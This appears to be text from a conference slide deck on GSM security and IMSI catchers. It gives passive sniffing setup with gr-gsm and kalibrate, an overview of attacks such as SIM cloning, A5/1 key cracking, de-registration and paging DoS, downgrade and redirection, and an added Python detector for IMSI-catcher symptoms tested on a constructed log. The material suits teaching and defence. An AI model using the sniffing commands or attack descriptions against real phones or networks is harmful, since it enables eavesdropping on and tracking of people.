LAC
What kind of data does an IMSI catcher capture?
Image source: Electronic Frontier Foundation
GSM sniffing with gr-gsm
Prepare the test environment: install the compilation dependencies, compile gr-gsm, compile kalibrate (choose the version that matches your SDR), scan for base stations with kal, then monitor the strongest carrier with grgsm_livemon.
# 1. Compilation dependencies (Debian/Ubuntu; the Python 2 package names date from the 2020 deck)
sudo apt-get install git cmake libboost-all-dev libcppunit-dev swig doxygen liblog4cpp5-dev python-scipy
# 2. Compile gr-gsm
git clone https://github.com/ptrkrysik/gr-gsm.git
cd gr-gsm
mkdir build && cd build
cmake ..
make
sudo make install
sudo ldconfig
cd ../..
# 3. Compile kalibrate (pick the one for your hardware)
git clone https://github.com/scateu/kalibrate-hackrf.git   # HackRF version
git clone https://github.com/steve-m/kalibrate-rtl.git     # RTL-SDR version
cd kalibrate-hackrf                                         # or kalibrate-rtl
./bootstrap
./configure
make
sudo make install
# 4. Scan the GSM900 band for BCCH carriers with gain 40
kal -s GSM900 -g 40
# 5. Monitor the downlink of one carrier, e.g. ARFCN 52 = 945.4 MHz; decoded frames are sent as GSMTAP to UDP port 4729 on localhost, where Wireshark can decode them
grgsm_livemon -f 945.4e6
GNU radio
GNU Radio is a framework that enables users to design, simulate, and deploy highly capable real-world
radio systems.
IMSI CATCHER
Two operating modes are known:
● Identification mode: collect the IMSI/IMEI of every phone in range and release it back to the real network
● Camping mode: keep the target phone attached so that its calls and messages pass through the catcher
StingRay II, a cellular site simulator used for surveillance purposes manufactured by
Harris Corporation, of Melbourne, Fla. Photo: U.S. Patent and Trademark Office via AP
MITM on 3G networks exploiting an SS7 vulnerability
White-Stingray: Evaluating IMSI Catchers Detection
Applications (Ravishankar Borgaonkar, Altaf Shaik)
App1: SnoopSnitch App2: Cell Spy Catcher
App3: GSM Spy Finder App4: Darshak
App5: AIMSICD
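The detection apps named on this slide all work from the same handful of observable symptoms: a cell that was never seen before, a location area change accompanied by a sudden signal jump, a Cipher Mode Command for A5/0, an Identity Request for the IMSI when a TMSI was already assigned, and a TMSI that is not reallocated after a location update. The following is an added example, not code from any of those apps or from the deck, that runs those heuristics over a constructed observation log; the baseline cells, rule thresholds and the log itself are assumptions made for the demo.

```python
from collections import Counter

# Cells this phone has seen from its real operator on earlier, trusted days (constructed).
BASELINE_CELLS = {("262", "01", 2000, 10001), ("262", "01", 2000, 10002), ("262", "01", 2000, 10003)}


def analyze(observations, baseline=BASELINE_CELLS, rssi_jump_db=25):
    """Run each observation through the heuristics; return a list of (index, rule, detail)."""
    alerts = []
    previous = None
    last_tmsi = None
    for idx, obs in enumerate(observations):
        cell = (obs["mcc"], obs["mnc"], obs["lac"], obs["cid"])
        if cell not in baseline:
            alerts.append((idx, "unknown_cell", f"LAC {obs['lac']} / CID {obs['cid']} never seen before"))
        if obs.get("cipher") == "A5/0":
            alerts.append((idx, "no_encryption", "network ordered A5/0"))
        if obs.get("identity_request") == "IMSI" and last_tmsi is not None:
            alerts.append((idx, "imsi_requested", "IMSI requested although a TMSI was already assigned"))
        if (previous is not None and obs["lac"] != previous["lac"]
                and obs["rssi"] - previous["rssi"] >= rssi_jump_db):
            alerts.append((idx, "lac_change_with_signal_jump", f"{previous['rssi']} -> {obs['rssi']} dBm"))
        if obs.get("event") == "location_update":
            if obs.get("tmsi") is not None and obs["tmsi"] == last_tmsi:
                alerts.append((idx, "tmsi_not_reallocated", "same TMSI after location update"))
            last_tmsi = obs.get("tmsi", last_tmsi)
        previous = obs
    return alerts


def verdict(alerts, min_rules=2):
    """Several independent rules firing on one capture is the signal; one alone is noise."""
    rules = Counter(rule for _, rule, _ in alerts)
    label = "probable IMSI catcher" if len(rules) >= min_rules else "nothing conclusive"
    return label, rules


# Constructed log: three normal observations, then a cell that behaves like a catcher.
SAMPLE_OBSERVATIONS = [
    {"mcc": "262", "mnc": "01", "lac": 2000, "cid": 10001, "rssi": -85, "cipher": "A5/1",
     "event": "location_update", "tmsi": 0x1A2B3C4D},
    {"mcc": "262", "mnc": "01", "lac": 2000, "cid": 10002, "rssi": -80, "cipher": "A5/1", "event": "idle"},
    {"mcc": "262", "mnc": "01", "lac": 2000, "cid": 10001, "rssi": -83, "cipher": "A5/1", "event": "idle"},
    {"mcc": "262", "mnc": "01", "lac": 9999, "cid": 1, "rssi": -45, "cipher": "A5/0",
     "event": "location_update", "tmsi": 0x1A2B3C4D, "identity_request": "IMSI"},
]

if __name__ == "__main__":
    found = analyze(SAMPLE_OBSERVATIONS)
    for idx, rule, detail in found:
        print(idx, rule, detail)
    print(verdict(found))
```

The verdict deliberately needs more than one rule: a new cell alone is what a freshly built site looks like, and A5/0 alone is what some operators run in rural areas. White-Stingray's point was that a catcher which avoids the obvious symptoms defeats single-rule apps, which is why the heuristics are combined rather than scored individually.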
Security Threats
GSM networks are both the victim and the source of attacks on user privacy
Common types of attack:
Image source: ENISA 2018
Threat: SIM cloning
Exploit: weaknesses in COMP128-1, used for key generation (A8) and authentication (A3), allow recovery of the
long-term key Ki with chosen RAND challenges
Requirements: physical access to the original SIM card, a card reader/writer, a blank programmable SIM and cracking
software
Effects: identity theft, theft of the victim's available credit/allowance, DoS
Mitigations: SIMs using COMP128-2/-3 or Milenage are not affected by this key-recovery attack; the operator can also detect a clone when the same IMSI is active in two places
Threat: Session key (Kc) retrieval (cracking tool available)
Exploit: weaknesses in A5/1
Requirements:
● 64 bits of known plaintext (e.g. predictable control messages) and a brute-force-like attack based on rainbow
tables (implemented in the Kraken tool)
● a way of locating the target user (e.g. silent SMS / silent call)
● a device to sniff traffic on the dedicated channel (e.g. a modified Motorola C1xx phone running OsmocomBB, or an SDR)
Effects: breach of phone call / SMS message confidentiality
Mitigations: use a stronger cipher (A5/3) or a newer network generation
Threat: User de-registration DoS attack
Exploit: lack of authentication and integrity protection of signalling messages
Requirements: MS-like device programmed to send IMSI DETACH messages for the victim's identity to the network
Effects: victim unreachable for mobile-terminated services (calls, SMS) until it re-registers
Threat: Paging response DoS attack
Exploit: lack of authentication of signalling messages
Requirements: MS-like device programmed to answer the victim's paging requests faster than the victim's
phone
Effects: incoming call dropped; incoming call hijacked if the attack is performed in an unencrypted network
Mitigations: use of encryption; a ciphering indicator on the MS showing when no encryption is in use
Threat: User tracking
Exploit: silent phone call / silent SMS to trigger paging; TMSI not updated often enough
Requirements: MS-like device programmed to sniff paging and signalling messages over the relevant channels
Effects: breach of user privacy (presence and coarse location of the victim)
Mitigations: frequent reallocation of the TMSI
Threat: 2G downgrade attack
Exploit: lack of authentication of the serving network in GSM (the MS cannot tell a fake BTS from a real one)
Requirements: fake BS (IMSI catcher)
Effects: the fake BS forces the MS down to 2G, where weaker or no encryption can be imposed
Mitigations: restrict the MS to 3G/LTE only in its settings where the platform allows it
Threat: Redirection attack
Exploit: lack of authentication of the serving network
Requirements: fake BS and an MS (the attacker's) connected to a real BS to relay the victim's traffic
Effects: redirection of the communication to a network of the attacker's choosing, perhaps one charging a higher rate
or using weaker encryption
Conclusion
Security mitigations have improved with each telecom generation, but security researchers and
attackers will always find their way around them.
Telecommunications providers are under fire from two sides: direct attacks from cybercriminals
intent on breaching their organisation and network operations, and indirect attacks from those in
pursuit of their subscribers.
Learning: Navigating 3GPP document
● 22 series: Service aspects
● 23 series: Technical realization
○ TS 23.203: Policy and Charging Control Architecture
○ TS 23.401: GPRS enhancements for E-UTRAN access
○ TS 23.501: Systems Architecture for the 5G System
● 24 series: Signaling protocols –user to network
○ TS 24.301 NAS protocol for EPS (MM, SM procedures)
● 29 series: Signaling protocols-intra-fixed-network
○ TS 29.171-173: Location Services
● 33 series: Security
● 36 series: LTE radio aspects
○ TS 36.300: E-UTRAN –Overall description; Stage 2
○ TS 36.331: Radio Resource Control (RRC); protocol specification
● 38 series: 5G NR radio aspects
http://www.3gpp.org/specifications/specification-numbering
There’s never enough time...
Harshit Agrawal
harshit.nic@gmail.com
@harshitnic
Himanshu Mehta
himanshu.mehta21@gmail.com
@nullvoid0x
